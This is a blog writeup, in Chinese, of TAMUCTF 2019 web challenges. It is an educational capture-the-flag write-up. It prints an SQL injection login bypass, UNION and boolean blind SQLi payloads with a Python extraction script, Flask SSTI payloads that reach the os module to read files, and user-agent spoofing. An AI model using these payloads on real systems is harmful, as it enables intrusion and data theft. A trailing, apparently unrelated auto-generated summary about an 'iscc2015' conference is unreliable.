TAMUCTF2019 web writeup

Not Another SQLi Challenge

万能密码 payload:username=admin&password=1'or 1=1#

Buckets

针对BUCKET的探针,使用浏览器打开Amazon提供的自动分配的S3 URL,格式为http://bucketname.s3.amazonaws.com 也就是修改url为http://tamuctf.s3.amazonaws.com/ 获得一个不受访问权限的bucket,找到关键文档Dogs/CC2B70BD238F48BE29D8F0D42B170127/CBD2DD691D3DB1EBF96B283BDC8FD9A1/flag.txt,获得flag。
学习资料:https://www.freebuf.com/articles/web/135313.html

Science!

直接给出提示flask,判断是ssti模板注入。测试注入点Chemical1,payload1.{{config}},注入存在
step1:1.{{[].__class__.__base__.__subclasses__()}}访问所有模块得到catch_warnings位置。
step2:{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals.keys()}}得到linecache,可以访问os模块了。
step3:{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].listdir('.')}}查看所有文件,得到flag.txt。
step4:1.{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].read([].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].open("flag.txt",[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].O_RDONLY),40)}}得到flag。

Robots Rule

提到robots,查看robots.txt
在这里插入图片描述
想让我们伪造成一个googlebot,百度一个googlebot的useragent
在这里插入图片描述
改一下user-agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)")
在这里插入图片描述

Many Gig’ems to you!

一个拼接的flag
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到flag:gigem{flag_in_source_and_}

Bird Box Challenge

开始的时候,使用了-1'union select database()#等一系列的语句读出库名,表名等一系列数据,但是都没有什么价值。库名:SqliDB,表名:Search,列名:items,查询内容:Eggs,Trucks,Aggies
最后google了一下writeup,看到flag藏到了user()当中,真的是没有想到…
payload:-1'union select user()#
在这里插入图片描述

1337 Secur1ty

开始的时候注册完就直接点开了message,是一个类似于guestbook的界面,下意识地反应这应该是一个关于xss的问题,但是邮件发不出去…,用burp抓取登陆的界面,看到了Cookie当中的userid和secret,userid应当是修改为1了,但是secret却不知道应该修改为何值。
在这里插入图片描述
此处找到了注入点id,进行bool类型的盲注

import requests
s=requests.session()
ans=''
for i in range(1,50):
    for j in range(37,127):
        #url="http://web6.tamuctf.com/message?id=1%27+and+ascii(substr((select+schema_name+from+information_schema.schemata%20limit+0%2C1)%2C"+str(i)+"%2C1))%3D"+str(j)+"+and+1%3D%271"
        #url="http://web6.tamuctf.com/message?id=1%27%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27Users%27limit%209,1),"+str(i)+",1))%3D"+str(j)+"%20and%201=%271"
        #url="http://web6.tamuctf.com/message?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()limit%202,1),"+str(i)+",1))%3D"+str(j)+"%20and%201=%271"
        url="http://web6.tamuctf.com/message?id=1%27%20and ascii(substr((select Secret from Users limit 0,1),"+str(i)+",1))="+str(j)+" and 1='1"
        c=s.get(url)
        if 'Bob' in c.text:
            ans=ans+chr(j)
            print('ans',ans)
            break

在这里插入图片描述
在这里插入图片描述
burp修改一下cookie,得到flag。
在这里插入图片描述

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值